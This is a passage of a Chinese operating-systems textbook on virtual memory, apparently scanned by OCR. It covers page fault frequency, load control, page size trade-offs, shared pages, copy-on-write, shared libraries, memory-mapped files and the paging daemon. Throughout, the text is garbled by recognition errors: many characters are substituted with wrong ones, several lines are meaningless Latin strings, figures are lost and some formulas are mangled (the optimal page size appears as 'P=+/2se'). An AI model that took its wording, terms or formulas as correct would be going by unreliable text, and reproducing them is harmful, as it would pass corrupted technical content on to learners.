出 了 何 时 增加 或 减少 分 配给 一 个 进程 的 页 面 ， 但 却 完全 没有 说 明 在 发 
生 缺 页 中 断 时 应 该 奉 换 掉 哪 一 个 页 面 ， 它 仅仅 控制 分 配 集 的 大 小 。 


正如 我 们 上 面 讨论 过 的 ， 有 一 大 类 页 面 置换 算法 (包括 LRU 在 
内 ) ， 缺 页 中 断 率 都 会 随 着 分 配 的 页 面 的 增加 而 降低 ， 这 是 PFF 背 后 的 
假定 。 这 一 性 质 在 图 3-24 中 说 明 。 


缺 页 中 断 数 /各 


SP ACY HL ot A 


图 3-24 缺 页 中 断 率 是 分 配 的 页 框 数 的 函数 


测量 缺 页 中 断 率 的 方法 是 直截了当 的 : 计算 每 秒 的 缺 页 中 断 数 ， 
可 能 也 会 将 过 去 数秒 的 情况 做 连续 平均 。 一 个 简单 的 方法 是 将 当前 这 
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一 秒 的 值 加 到 当前 的 连续 平均 值 上 然后 除 以 2。 虚 线 A 对 应 于 一 个 高 得 


不 可 接受 的 缺 页 中 断 率 ， 虚 线 B 则 对 应 于 一 个 低 得 可 以 假设 进程 拥有 过 
多 内 存 的 缺 页 中 断 率 。 在 这 种 情况 下 ， 可 能 会 从 该 进程 鸭 质 源 中 和 剥夺 
部 分 页 框 。 这 样 ，PFF 尽 力 让 每 个 进程 的 缺 页 中 断 率 控制 在 可 接受 的 范 
围 内 。 


值得 注意 的 是 ， 一 些 页 面 置 换算 法 既 适 用 于 局 部 置换 算法 ， 又 适 
用 于 全 局 置换 算法 。 例 如 ，FIFO 能 够 将 所 有 内 存 中 最 老 的 页 面 置换 掉 
(全 局 算法 ) ， 也 能 将 当前 进程 的 页 面 中 最 老 的 蔡 换 掉 (局 部 算 
法 ) 。 相 似 地 ，LRU 或 是 一 些 类 似 算法 能 够 将 所 有 内 存 中 最 近 最 少 访 
问 的 页 框 蔡 换 掉 〈 全 局 算法 ) ， 或 是 将 当前 进程 中 最 近 最 少 使 用 的 页 
框 蔡 换 掉 〈 局 部 算法 ) 。 在 某 些 情况 下 ， 选 择 局 部 策略 还 是 全 局 策略 
征 与 页 面 置换 算法 无 关 的 。 


另 一 方面 ， 对 于 其 他 的 页 面 置 换算 法 ， 只 有 采用 局 部 策略 才 有 意 

o 特别 是 工作 和 集 和 WSClock 算 法 是 针对 某 些 特定 进程 的 而 且 必 须 应 
用 在 这 些 进程 的 上 下 文中 。 实 际 上 没有 针对 整个 机 絮 的 工作 集 ， 并 且 
试图 使 用 所 有 工作 集 的 并 集 作为 机 器 的 工作 集 可 能 会 丢失 一 些 局 部 特 
性 ， 这 样 算法 束 不 能 得 到 好 的 性 能 


3.5.2 ”人 负载 控制 


即使 是 使 用 最 优 页 面 置换 算法 并 对 进程 采用 理想 的 全 局 页 框 分 
配 ， 系 统 也 可 能 会 发 生 颠 艇 。 事 实 上 ， 一 旦 所 有 进程 的 组 合 工作 集 超 
出 了 内 存 容量 ， 就 可 能 发 生 丰 艇 。 该 现象 的 症状 之 一 就 是 如 PFF 算 法 
所 指出 的 ， 一 些 进程 需要 更 多 的 内 存 ， 但 是 没有 进程 需要 更 少 的 内 
存 。 在 这 种 情况 下 ， 没 有 方法 能 够 在 不 影响 其 他 进程 的 情况 下 满足 那 
些 需 要 更 多 内 存 的 进程 的 需要 。 惟 一 现实 的 解决 方案 就是 暂时 从 内 存 
中 去 挥 一 些 进程 。 


减少 竞争 内 存 的 进程 数 的 一 个 好 方法 是 将 一 部 分 进程 交换 到 磁 
盘 ， 并 释放 他 们 所 占有 的 所 有 页 面 。 例 如 ， 一 个 进程 可 以 被 交换 到 磁 
fe, MO TAY UAE BY DAD PBA AS EE Do HARB 
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其 他 进程 交换 出 去 ， 直 到 颠 艇 结束 。 因 此 ， 即 使 是 使 用 分 页 ， 交 换 也 


征 需 要 的 ， 只 是 现在 交换 是 用 来 减少 对 内 存 潜在 的 需求 ， 而 不 是 收回 
它 的 页 面 。 


将 进程 交换 出 去 以 减轻 内 存 需求 的 压力 是 借用 了 两 级 调度 的 思 
想 ， 在 此 过 程 中 一 些 进程 补 放 到 磁 副 ， 此 时 用 一 个 短期 的 调度 程序 来 
调度 剩余 的 进程 。 很 明显 ， 这 两 种 思路 可 以 被 组 合 起 来 ， 将 恰好 足够 


的 进程 交换 出 去 以 获取 可 接受 的 缺 页 中 断 率 。 一 些 进程 被 周期 性 地 从 
傍 副 调 入 ， 而 其 他 一 些 则 被 周期 性 地 交换 到 秒 玛 。 


不 过 ， 必 一 个 需要 考虑 的 因素 是 多 道 程 序 设计 的 道 数 。 当 内 存 中 
的 进程 数 过 低 的 时 候 ，CPU 可 能 在 很 长 的 时 间 内 处 于 空 亲 状态。 考虑 
到 该 因素 ， 在 决定 交换 出 哪个 进程 时 不 光 要 考虑 进程 大 小 和 分 页 率 ， 
还 要 考虑 它 的 特性 (如 它 究竟 是 CPU 密 集 型 还 是 1/O 密 集 型 ) 以 及 其 他 


进程 的 特性 。 


3.5.3 页面 大 小 


页 面 大 小 是 操作 系统 可 以 选择 的 一 个 参数 。 例 如 ， 即 使 硬件 设计 
只 支持 512 字 市 的 页 面 ， 操 作 系 统 也 可 以 很 容易 通过 总 是 为 页 面 对 0 和 
1、2 和 3、4 和 5 等 分 配 两 个 连续 的 512 字 节 的 页 框 ， 而 将 其 作为 1KB 的 
页 面 。 


要 确定 最 佳 的 页 面 大 小 需要 在 儿 个 互相 矛盾 的 因素 之 间 进 行 权 
衡 。 从 结果 看 ， 不 存在 全 局 最 优 。 首 和 完 ， 有 两 个 因素 可 以 作为 克 择 小 
页 面 的 理由 。 随 便 选 择 一 个 正文 段 、 数 据 段 或 堆栈 段 很 可 能 不 会 恰好 
洲 满 整数 个 页 面 ， 平 均 的 情况 下 ， 最 后 一 个 页 面 中 有 一 半 古 空 的 。 多 
余 的 空间 就 被 浪 费 挥 了 ， 这 种 浪费 称 为 内 部 雄 片 (internal 
fragmentation) 。 在 内 存 中 有 n 个 段 、 页 面 大 小 为 p 字 节 时 ， 会 有 np/2 字 
万 被 内 部 碎片 当 费 。 从 这 方面 考虑 ， 使 用 小 页 面 更 好 。 


选择 小 页 面 还 有 一 个 明显 的 好 处 ， 如 果 考 虑 一 个 程序 ， 它 分 成 8 个 
阶段 顺序 执行 ， 每 阶段 需要 4KB 内 存 。 如 果 页 面 大 小 是 32KB， 那 就 必 
须 始终 给 该 进程 分 配 32KB 内 存 。 如 果 页 面 大 小 是 16KB， 它 就 只 需要 
16KB。 如 果 页 面 大 小 是 4KB 或 更 小 ， 在 任何 时 刻 它 只 需要 4KB 内 存 。 
总 的 来 说 ， 与 小 页 面相 比 ， 大 页 面 使 更 多 没有 用 的 程序 保留 在 内 存 
中 o 


在 另 一 方面 ， 页 面 小 意味 着 程序 需要 更 多 的 页 面 ， 这 又 意味 着 需 
要 更 大 的 页 表 。 一 个 32KB 的 程序 只 需要 4 个 8KB 的 页 面 ， 却 需要 64 个 
512 字 节 的 页 面 。 内 存 与 磁盘 之 间 的 传输 一 般 是 一 次 一 页 ， 传 输 中 的 大 
部 分 时 间 都 花 在 了 寻 道 和 旋转 延迟 上 ， 所 以 传输 一 个 小 的 页 面 所 用 的 
时 间 和 传输 一 个 大 的 页 面 基 本 上 是 相同 的 。 装 入 64 个 512 字 市 的 页 面 可 
能 需要 64x10ms， 而 装 入 4 个 8KB 的 页 面 可 能 只 需要 4x12ms © 


在 某 些 机 器 上 ， 每 次 CPU 从 一 个 进程 切换 到 另 一 个 进程 时 都 必须 
把 新 进程 的 页 表 装 入 硬件 寄存 器 中 。 这 样 ， 页 面 越 小 意味 着 装 入 页 面 
寄存 器 花费 的 时 间 就 会 越 长 ， 而 且 页 表 占用 的 空间 也 会 随 着 页 面 的 减 
小 而 增 大 。 


最 后 一 上 感 可 以 从 数学 上 进行 分 析 ， 假 设 进 程 平均 大 小 是 s 个 字 广 ， 
页 面 大 小 是 p 个 字 季 ， 每 个 页 表 项 需要 e 个 字 帮 。 那 么 每 个 进程 需要 的 
页 数 大 约 是 s/p， 占 用 了 se/p 个 字 市 的 页 表 空 间 。 内 部 碎 厂 在 最 后 一 页 
浪费 的 内 存 是 p/2。 因 此 ， 由 页 表 和 内 部 碎片 损失 造成 的 全 部 开销 十 以 
下 两 项 之 和 : 


开销 =se/p+p/2 


在 页 面 比较 小 的 时 候 ， 第 一 项 (页 表 大 小 ) 大 。 在 页 面 比较 大 时 
第 二 项 (内 部 碎片 ) 大 。 最 优 值 一 定 在 页 面 大 小 处 于 中 间 的 某 个 值 时 
取得 ， 通 过 对 p 一 次 求 导 并 令 右 边 等 于 零 ， 我 们 得 到 方程 : 


-se/p* +1/2=0 


从 这 个 方程 可 以 得 出 最 优 页 面 大 小 的 公式 CR EE YR BAT 
表 所 需 的 内 存 ) , BAAR RE: 


P=+/2se 


对 于 s=1MB 和 每 个 页 表 项 e=8 个 字 方 ， 最 优 页 面 大 小 是 4KB。 商 用 
计算 机 使 用 的 页 面 大 小 一 般 在 512 字 节 到 64KB 之 间 ， 以 前 的 典型 值 是 
1KB， 而 现在 更 常见 的 页 面 大 小 十 4 KB 或 8KB。 随 着 存储 恬 越 来 越 
大 ， 页 面 也 倾向 于 更 大 (但 不 是 线性 的 )  。 把 RAM 扩 大 4 倍 极 少 会 使 
页 面 大 小 加 倍 。 


3.5.4 分离 的 指令 空间 和 数据 空间 


大 多 数 计算 机 只 有 一 个 地 址 空间 ， 既 存放 程序 也 存放 数据 ， 如 图 3- 
25a 所 示 。 如 果 地 址 空间 足够 大 ， 那 么 一 切 都 好 。 然 而 ， 地 址 空间 通 肖 
太 小 了 ， 这 束 使 得 程序 员 对 地 址 空间 的 使 用 出 现 困 难 。 


D 空间 


} 未 使 用 页 面 


数据 


图 3-25 a) 单 个 地 址 空间 ，b) 分 离 的 I 空间 和 D 空 间 


首先 在 PDP-11 (16 位 ) 上 实现 的 一 种 解决 方案 是 ， 为 指令 (程序 
EX) 和 数据 设置 分 离 的 地 址 空间 ， 分 别称 为 I 空间 和 D 空 间 ， 如 图 3- 
25b 所 示 。 每 个 地 址 空间 都 从 0 开始 到 某 个 最 大 值 ， 比 较 有 代表 性 的 是 
216 -1 或 者 232 -1。 链 接 器 必须 知道 何 时 使 用 分 离 的 I 空 间 和 D 空 间 ， 因 为 
当 使 用 它们 时 ， 数 据 被 重 定位 到 虚拟 地 址 0， 而 不 是 在 程序 之 后 开始 。 


在 使 用 这 种 设计 的 计算 机 中 ， 两 种 地 址 空间 都 可 以 进行 分 页 ， 而 
且 互 相 独立 。 它 们 分 别 有 目 己 的 页 表 ， 分 别 完成 虚拟 页 面 到 物理 页 杠 


的 上 映射。 当 硬 件 进 行 取 指 令 操 作 时 ， 它 知道 要 使 用 I 空间 和 I 空间 页 表 。 
类 似 地 ， 对 数据 的 访问 必须 通过 D 空 间 页 表 。 除 了 这 一 区 别 ， 拥 有 分 离 
的 I 空间 和 DD 空间 不 会 引入 任何 复杂 的 设计 ， 而 且 它 还 能 使 可 用 的 地 址 
空间 加 倍 。 


3.55 “共享 页 面 


男 一 个 设计 问题 是 共享 。 在 大 型 多 道 程序 设计 系统 中 ， 几 个 不 同 
的 用 户 同 时 运行 同一 个 程序 是 很 常见 的 。 显 然 ， 由 于 避免 了 在 内 存 中 
有 一 个 页 面 的 两 份 副本 ， 共 享 页 面 效率 更 高 。 这 里 存在 一 个 问题 ， 即 
并 不 是 所 有 的 页 面 都 适合 共享 。 特 别 地 ， 那 些 只 读 的 页 面 (诸如 程序 
文本 ) 可 以 共享 ， 但 是 数据 页 面 则 不 能 共享 。 


如 果 系 统 支 持 分 离 的 I 空间 和 DD 空间 ， 那 么 通过 让 两 个 或 者 多 个 进 
程 来 共享 程序 就 变 得 非常 简单 了 ， 这 些 进程 使 用 相同 的 I 空间 页 表 和 不 
同 的 D 空 间 页 表 。 在 一 个 比较 典型 的 使 用 这 种 方式 来 文 持 共 享 的 实现 
中 ， 页 表 与 进程 表 数 据 结构 无 和 天。 每 个 进程 在 它 的 进程 表 中 都 有 两 个 
指针 :一 个 指 同 I 空间 页 表 ， 一 个 指 同 D 空 间 页 表 ， 如 图 3-26 所 示 。 当 
调度 程序 选择 一 个 进程 运行 时 ， 它 使 用 这 些 指针 来 定位 合适 的 页 表 ， 
并 使 用 它们 来 设立 MMU。 即使 没有 分 离 的 I 空间 和 D 空 间 ， 进 程 也 可 以 
共 至 程序 (或 者 有 时 为 库 ) ， 但 要 使 用 更 为 复杂 的 机 制 。 
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图 3-26 两 个 进程 通过 共享 程序 页 表 来 共享 同一 个 程序 


在 两 个 或 更 多 进程 共享 某 些 代码 时 ， 在 共享 页 面 上 存在 一 个 问 
题 。 假 设 进程 A 和 进程 B 同 时 运行 一 个 编辑 器 并 共 衬 页 面 。 如 果 调 度 程 
序 决定 从 内 存 中 移 走 A， 撤 销 其 所 有 的 页 面 并 用 一 个 其 他 程序 来 填充 这 
些 空 的 页 框 ， 则 会 引起 B 产 生 大 量 的 缺 页 中 断 ， 才 能 把 这 些 页 面 重新 调 


> 


类 似 地 ， 当 进程 A 结 束 时 ， 能 够 发 现 这 些 页 面 仍然 在 被 使 用 是 非常 
必要 的 ， 这 样 ， 这 些 页 面 的 磁盘 空间 才 不 会 被 随意 释放 。 和 查找 所 有 的 
页 表 ， 考 察 一 个 页 面 是 否 共享 ， 其 代价 通常 比较 大 ， 所 以 需要 专门 的 
数据 结构 记录 共享 页 面 ， 特 别 地 ， 如 果 共 享 的 单元 是 单个 页 面 (或 一 
批 页 面 ) ， 而 不 是 整个 页 表 。 


共 吾 数 据 要 比 共 享 代码 麻烦 ， 但 也 不 是 不 可 能 。 特 别 是 在 UNIX 
中 ， 在 进行 fork 系 统 调用 后 ， 父 进程 和 子 进 程 要 共享 程序 文本 和 数据 。 
在 分 页 系统 中 ， 通 前 是 让 这 些 进程 分 别 拥有 它们 目 己 的 页 表 ， 但 都 指 
向 同一 个 页 面 集 合 。 这 样 在 执行 fork 调 用 时 就 不 需要 进行 页 面 复制 。 然 
而 ， 所 有 有 映射 到 两 个 进程 的 数据 页 面 都 是 只 读 的 。 


只 要 这 两 个 进程 都 仅仅 是 读数 据 ， 而 不 做 更 改 ， 这 种 情况 束 可 以 
保持 下 去 。 但 只 要 有 一 个 进程 更 新 了 一 点 数据 ， 束 会 触发 只 读 保护 ， 
并 引发 操作 系统 陷阱 。 然 后 会 生成 一 个 该 页 的 副本 ， 这 样 每 个 进程 都 
有 目 己 的 专用 副本 。 两 个 复制 都 是 可 以 读 写 的 ， 随 后 对 任何 一 个 副本 
的 写 操作 都 不 会 再 引发 陷阱 。 这 种 策略 意味 着 那些 从 来 不 会 执行 写 操 
作 的 页 面 (包括 所 有 程序 页 面 ) 是 不 需要 复制 的 ， 只 有 实际 修改 的 数 
据 页 面 需要 复制 。 这 种 方法 称 为 写 时 复制 ， 它 通过 减少 复制 而 提高 
性 能 。 


3.5.6 ”共享 库 


可 以 使 用 其 他 的 粒度 取代 单个 页 面 来 实现 共享 。 如 果 一 个 程序 被 
启动 两 次 ， 大 多 数 操作 系统 会 自动 共享 所 有 的 代码 页 面 ， 而 在 内 存 中 
只 保留 一 份 代码 页 面 的 副本 。 代 码 页 面 总 是 只 读 的 ， 因 此 这 样 做 不 存 
在 任何 问题 。 依 赖 于 不 同 的 操作 系统 ， 每 个 进程 都 拥有 一 份 数据 页 面 
的 私有 副本 ， 或 者 这 些 数据 页 面 被 共享 并 且 被 标记 为 只 读 。 如 果 任 何 
一 个 进程 对 一 个 数据 页 面 进行 修改 ， 系 统 就 会 为 此 进程 复制 这 个 数据 
页 面 的 一 个 副本 ， 并 且 这 个 副本 是 此 进程 私有 的 ， 也 就 是 说 会 执行 写 
时 复制 ”。 


现代 操作 系统 中 ， 有 很 多 大 型 库 被 众多 进程 使 用 ， 例 如 ， 处 理 浏 
毁 文 件 以 便 打开 文件 的 对 话 框 的 库 和 多 个 图 形 库 。 把 所 有 的 这 些 库 静 
态 地 与 磁盘 上 的 每 一 个 可 执行 程序 绑 定 在 一 起 ， 将 会 使 它们 变 得 更 加 
大。 


Si 


一 个 更 加 通用 的 技术 是 使 用 共享 库 (在 Windows 中 称 作 DLL 或 动态 
链接 库 ) 。 为 了 清楚 地 表达 共 吝 库 的 思想 ， 首 先 考 虑 一 下 传统 的 链 
接 。 当 链接 一 个 程序 时 ， 要 在 链接 器 的 命令 中 指定 一 个 或 多 个 目标 文 
件 ， 可 能 还 包括 一 些 库 文件 。 以 下 面 的 UNIX 命 令 为 例 


1ld*.o-lc-1m 


这 个 命令 会 链接 当前 目录 下 的 所 有 的 .o (目标 ) 文件， 并 扫描 两 个 
JÆ: slib/libc.a 和 /musrvlib/libm.a。 任 何在 目标 文件 中 被 调用 了 但 是 没 
有 被 定义 的 函数 (EA, print) ， 都 被 称 作 未 定义 外 部 函数 
(undefined externals) 。 链 接 器 会 在 库 中 寻找 这 些 未 定义 外 部 落 数 。 如 
果 找 到 了 ， 则 将 它们 加 载 到 可 执行 二 进 制 文件 中 。 任 何 被 这 些 未 定义 
外 部 函数 调用 了 但 是 不 存在 的 函数 也 会 成 为 未 定义 外 部 函数 。 例 如 ， 
printf 需 要 write， 如 果 write 还 没有 被 加 载 进来 ， 链 接 恬 就 会 查找 write 并 
在 找到 后 把 它 加 载 进来 。 当 链接 器 完成 任务 后 ， 一 个 可 执行 二 进 制 文 
件 被 写 到 人 磁盘， 其 中 包括 了 所 需 的 全 部 函数 。 在 库 中 定义 但 是 没有 被 
调用 的 函数 则 不 会 被 加 载 进 去 。 当 程序 被 装 入 内 存 执行 时 ， 它 需要 的 
所 有 函数 都 已 经 准备 就 绪 了 。 


假设 普通 程序 需要 消耗 20~-50MB 用 于 图 形 和 用 户 界 面 函 数 。 
链接 上 百 个 包括 这 些 库 的 程序 会 浪费 大 量 的 磁盘 空间 ， 在 装载 这 
rue 

aay 
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这 就 是 引入 共享 库 的 原因 。 当 一 个 程序 和 共享 库 (与 静态 库 有 
All) 链接 时 ， 链 接 器 没有 加 载 被 调用 的 函数 ， 而 是 加 载 了 一 小段 能 够 
在 运行 时 绑 定 被 调用 函数 的 存根 例 程 (stub routine) 。 依 赖 于 系统 和 配 
置信 息 ， 共 享 库 或 者 和 程序 一 起 被 装载 ， 或 者 在 其 所 包含 画 数 第 一 次 
被 调用 时 被 装载 。 当 然 ， 如 果 其 他 程序 已 经 装载 了 某 个 共享 库 ， 驶 没 
有 必要 再 次 装载 它 了 一 一 这 正 是 关键 所 在 。 值 得 注意 的 是 ， 当 一 个 共 
享 库 被 装载 和 使 用 时 ， 整 个 库 并 不 是 被 一 次 性 地 读 入 内 存 。 而 是 根据 
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到 内 存 中 的 。 


除了 可 以 使 可 执行 文件 更 小 、 节省 内 存 空间 之 外 ， 共 享 库 还 有 一 
个 优点 ， 如 果 共 至 库 中 的 一 个 函数 因为 修正 一 个 bug 被 更 新 了 ， 那 么 并 
不 需要 重新 编译 调用 了 这 个 函数 的 程序 。 旧 的 二 进 制 文 件 依 然 可 以 正 
常 工作 。 这 个 特性 对 于 两 业 软 件 来 说 尤为 重要 ， 因 为 商业 软件 的 源码 
不 会 分 发 给 客户 。 例 如 ， 如 有 果 微 软 发 现 并 修复 了 某 个 标准 DLL 中 的 安 
全 错误 ，Windows 更 新 会 下 载 新 的 DLL 来 蔡 换 原 有 文件 ， 所 有 使 用 这 个 
DLL 的 程序 在 下 次 启动 时 会 自动 使 用 这 个 新 版 本 的 DLL。 


不 过 ， 共 享 库 带 来 了 一 个 必须 解决 的 小 问题 ， 如 图 3-27 所 示 。 我 们 
看 到 有 两 个 进程 共享 一 个 20KB 大 小 的 库 (假设 每 一 方 框 为 4KB) 。 但 
是 ， 这 个 库 被 不 同 的 进程 定位 在 不 同 的 地 址 上 ， 大 概 是 因为 程序 本 身 
的 大 小 不 相同 。 在 进程 1 中 ， 库 从 地 址 36K 开 始 ; 在 进程 2 中 则 从 地 址 
12K 开 始 。 假 设 库 中 第 一 个 函数 要 做 的 第 一 件 事 就 是 路 转 到 库 的 地 址 
16。 如 果 这 个 库 没 有 被 共享 ， 它 可 以 在 装载 的 过 程 中 重 定位 ， 就 会 跳 
转 (在 进程 1 中 ) 到 虚拟 地 址 的 36K+16。 注 意 ， 库 被 装载 到 的 物理 地 址 
与 这 个 库 是 否 为 共享 库 是 没有 任何 关系 的 ， 因 为 所 有 的 页 面 都 被 MMU 
硬件 从 虚拟 地 址 映射 到 了 物理 地 址 。 


进程 1 RAM 进程 2 
图 3-27 两 个 进程 使 用 的 共享 库 


但 是 ， 由 于 库 是 共享 的 ， 因 此 在 装载 时 再 进行 重 定位 就 行 不 通 
了 。 毕 竟 ， 当 进程 2 调用 第 一 个 函数 时 〈 在 地 址 12K) ， 跳 转 指令 需要 
跳 转 到 地 址 12K+16， 而 不 是 地 址 36K+16。 这 就 是 那个 必须 解决 的 小 问 
题 。 解 决 它 的 一 个 办 法 是 写 时 复制 ， 并 为 每 一 个 共享 这 个 库 的 进程 创 
建新 页 面 ， 在 创建 新 页 面 的 过 程 中 进行 重 定 位 。 当 然 ， 这 样 做 和 使 用 
共享 库 的 目的 相悖 。 


一 个 更 好 的 解决 方法 是 : 在 编译 共享 库 时 ， 用 一 个 特殊 的 编译 选 
项 告知 编译 器 ， 不 要 产生 使 用 绝对 地 址 的 指令 。 相 反 ， 只 能 产生 使 用 
相对 地 址 的 指令 。 例 如 ， 几 乎 总 是 使 用 向 前 (或 向 后 ) 跳 转 n 个 字 证 
(与 给 出 具体 跳 转 地 址 的 指令 不 同 ) 的 指令 。 不 论 共享 库 被 放置 在 虚 


拟 地 址 空间 的 什么 位 置 ， 这 种 指令 都 可 以 正确 工作 。 通 过 避免 使 用 绝 
对 地 址 ， 这 个 问题 就 可 以 被 解决 。 只 使 用 相对 偏 移 量 的 代码 被 称 作 位 
置 无 关 代 人 码 (position-independent code) ° 


3.5.7 MRNK 
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(memory-mapped file) 的 一 个 特例 。 这 种 机 制 的 思想 是 : 进程 可 以 通 
过 发 起 一 个 系统 调用 ， 将 一 个 文件 映 喘 到 其 虚拟 地 址 空间 的 一 部 分 。 
在 多 数 实现 中 ， 在 映射 共享 的 页 面 时 不 会 实际 读 入 页 面 的 内 容 ， 而 是 
在 访问 页 面 时 才 会 被 每 次 一 页 地 读 入 ， 人 磁盘 文件 则 被 当 作 后 备 存 储 。 
当 进 程 退出 或 显 式 地 解除 文件 映 映 时 ， 所 有 被 改动 的 页 面 会 被 写 回 到 
te 


内 存 映 射 文件 提供 了 一 种 UVO 的 可 选 模型 。 可 以 把 一 个 文件 当 作 一 
个 内 存 中 的 大 字符 数组 来 访问 ， 而 不 用 通过 读 写 操作 来 访问 这 个 文 
件 。 在 一 些 情况 下 ， 程 序 员 发 现 这 个 模型 更 加 便利 。 


如 果 两 个 或 两 个 以 上 的 进程 同时 映射 了 同一 个 文件 ， 它 们 就 可 以 
通过 共 至 内 存 来 通信 。 一 个 进程 在 共 至 内 存 上 完成 了 写 操 作 ， 此 刻 当 
男 一 个 进程 在 映 冉 到 这 个 文件 的 虚拟 地 址 空间 上 执行 读 操作 时 ， 它 束 
可 以 立刻 看 到 上 一 个 进程 写 操作 的 结果 。 因 此 ， 这 个 机 制 提 供 了 一 个 
进程 之 间 的 高 带宽 通道 ， 而 且 这 种 应 用 很 普遍 (甚至 扩展 到 用 来 映射 
无 名 的 临时 文件 ) 。 很 显然 ， 如 果 内 存 映 里 文件 可 用 ， 共 至 库 束 可 以 
使 用 这 个 机 制 。 


3.5.8 ”清除 策略 


如 打发 生 缺 页 中 断 时 系统 中 有 大 量 的 空 亲 页 框 ， 此 时 分 页 系统 工 
作 在 最 佳 状态 。 如 果 每 个 页 框 都 被 占用 ， 而 且 被 修改 过 的 话 ， 再 换 入 
一 个 新 页 面 时 ， 旧 页 面 应 首先 被 写 回 亿 盘 。 为 保证 有 足够 的 空 几 页 
框 ， 很 多 分 页 系统 有 一 个 称 为 分 页 守护 进程 (paging daemon) 的 后 台 
进程 ， 它 在 大 多 数 时 候 睡 卢 ， 但 定期 被 唤醒 以 检查 内 存 的 状态 。 如 末 
空闲 页 框 过 少 ， 分 页 守护 进程 通过 预定 的 页 面 置换 算法 选择 页 面 换 出 
内 存 。 如 采 这 些 页 面 逆 入 内 存 后 被 修改 过 ， 则 将 它们 写 回 磁盘 。 


在 任何 情况 下 ， 页 面 中 原先 的 内 容 痢 被 记录 下 来 。 当 需要 使 用 一 
个 已 被 淘汰 的 页 面 时 ， 如 采 该 页 框 还 没有 被 禾 兰 ， 将 其 从 空 采 页 框 组 
冲 池 中 移出 即 可 恢复 该 页 面 。 保 存 一 定数 目的 页 框 供给 比 使 用 所 有 内 
存 并 在 需要 时 搜索 一 个 页 框 有 更 好 的 性 能 。 分 页 守护 进程 至 少 保 证 了 
所 有 的 空 亲 页 框 是 “干净 "的 ， 所 以 空 采 页 框 在 被 分 配 时 不 必 再 急 痢 写 
回 磁盘 。 


一 种 实现 清除 策略 的 方法 束 古 使 用 一 个 双 指 针 时 钟 。 前 指针 由 分 
页 守护 进程 控制 。 当 它 指 同一 个 脏 页 面 时 ， 残 把 该 页 面 写 回 磁盘 ， 前 
指针 向 前 移动 。 当 它 指向 一 个 干净 页 面 时 ， 仪 仅 指针 疝 前 移动 。 后 指 


针 用 于 页 面 置换 ， 吏 像 在 标准 时 钟 算法 中 一 样 。 现 在 ， 由 于 分 页 守护 
进程 的 工作 ， 后 指针 命中 干净 页 面 的 概率 会 增加 。 


3.5.9 ”虚拟 内 存 接口 


到 现在 为 止 ， 所 有 的 讨论 都 假定 虚拟 内 存 对 进程 和 程序 员 来 说 是 
透明 的 ， 也 就 是 说 ， 它 们 都 可 以 在 一 台 只 有 较 少 物理 内 存 的 计算 机 上 
看 到 很 大 的 虚拟 地 址 空间 。 对 于 不 少 系统 而 言 这 样 做 是 对 的 ， 但 对 于 
一 些 高 级 系统 而 言 ， 程 序 员 可 以 对 内 存 映 射 进行 控制 ， 并 可 以 通过 非 
常规 的 方法 来 增强 程序 的 行为 。 这 一 世 我 们 将 简短 地 讨论 一 下 这 些 问 


题 。 


允许 程序 员 对 内 存 映 射 进行 控制 的 一 个 原因 融 是 为 了 人 允许 两 个 或 
者 多 个 进程 共享 同一 部 分 内 存 。 如 果 程 序 员 可 以 对 内 存 区 域 进行 命 
和 名， 那么 隐 有 可 能 实现 共享 内 存 。 通 过 让 一 个 进程 把 一 片 内存 区 域 的 
名 称 通 知 另 一 个 进程 ， 而 使 得 第 二 个 进程 可 以 把 这 片区 域 映 射 到 它 的 
虚拟 地 址 空间 中 去 。 通 过 两 个 进程 (或 者 更 多 ) 共享 同一 部 分 页 面 ， 
高 带 览 的 共 至 束 成 为 可 能 一 一 一 个 进程 往 共 至 内 存 中 写 内 容 而 男 一 个 


从 中 读 出 内 容 。 


页 面 共 享 也 可 以 用 来 实现 高 性 能 的 消息 传递 系统 。 一 般 地 ， 传 递 
消 轧 的 时 候 ， 数 据 被 从 一 个 地 址 空间 复制 到 另 一 个 地 址 空间 ， 开 销 很 
大 。 如 有 果 进 程 可 以 控制 它们 的 页 面 映 映 ， 束 可 以 这 样 来 发 送 一 条 消 
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出 进 来 。 这 里 只 需要 复制 页 面 的 名 字 ， 而 不 需要 复制 所 有 数据 。 


另外 一 种 高 级 存储 管理 拉 术 是 分 布 式 共享 内 存 (Feeley A, 
1995; Li, 1986; Li 和 Hudak，1989; Zekauskas 等 人 ，1994) 。 该 方 
法 人 允许 网 络 上 的 多 个 进程 共享 一 个 页 面 集合 ， 这 些 页 面 可 能 (而 不 是 
必要 的 ) 作为 单个 的 线性 共享 地 址 空间 。 当 一 个 进程 访问 当前 还 没有 
映射 进来 的 页 面 时 ， 就 会 产生 缺 页 中 断 。 在 内 核 空间 或 者 用 户 空间 中 
的 缺 页 中 断 处 理 程序 束 会 对 拥有 该 页 面 的 机 妖 进 行 定 位 ， 并 向 它 发 送 
一 条 消息 ， 请 求 它 清除 该 页 面 的 映射 ， 并 通过 网 络 发 送出 来 。 当 页 面 
到 达 时 ， 就 把 它 映 射 进来 ， 并 重新 开始 运行 引起 缺 页 中 断 的 指令 。 在 
第 8 章 中 我 们 将 详细 讨论 分 布 式 共享 内 存 。 


3.6 ”有 关 实 现 的 问题 


实现 虚拟 内 存 系统 要 在 主要 的 理论 算法 (如 第 二 次 机 会 算法 与 老 
化 算法 ， 局 部 页 面 分 配 与 全 局 页 面 分 配 ， 请 求 调 页 与 预先 调 页 ) 之 间 
进行 选择 。 但 同时 也 要 注意 一 系列 实际 的 实现 问题 。 在 这 一 节 中 将 涉 
及 一 些 通常 情况 下 会 遇 到 的 问题 以 及 一 些 解决 方案 。 


361 与 分 页 有 关 的 工作 


操作 系统 要 在 下 面 的 四 段 时 间 里 做 与 分 页 相关 的 工作 : 进程 创建 
时 ， 进 程 执行 时 ， 缺 页 中 断 时 和 进程 终止 时 。 下 面 将 分 别 对 这 四 个 时 
期 进行 简短 的 分 析 。 


当 在 分 页 系统 中 创建 一 个 新 进程 时 ， 操 作 系统 要 确定 程序 和 数据 
在 初始 时 有 多 大 ， 并 为 它们 创建 一 个 页 表 。 操 作 系统 还 要 在 内 存 中 为 
页 表 分 配 空 间 并 对 其 进行 初始 化 。 当 进程 被 换 出 时 ， 页 表 不 需要 驻 留 
在 内 存 中 ， 但 当 进 程 运行 时 ， 它 必须 在 内 存 中 。 为 外， 操作 系统 要 在 
人 磁盘 交换 区 中 分 配 空 间 ， 以 便 在 一 个 进程 换 出 时 在 们 c 副 上 有 放置 此 进 
程 的 空间 。 操 作 系 统 还 要 用 程序 正文 和 数据 对 交换 区 进行 初始 化 ， 这 
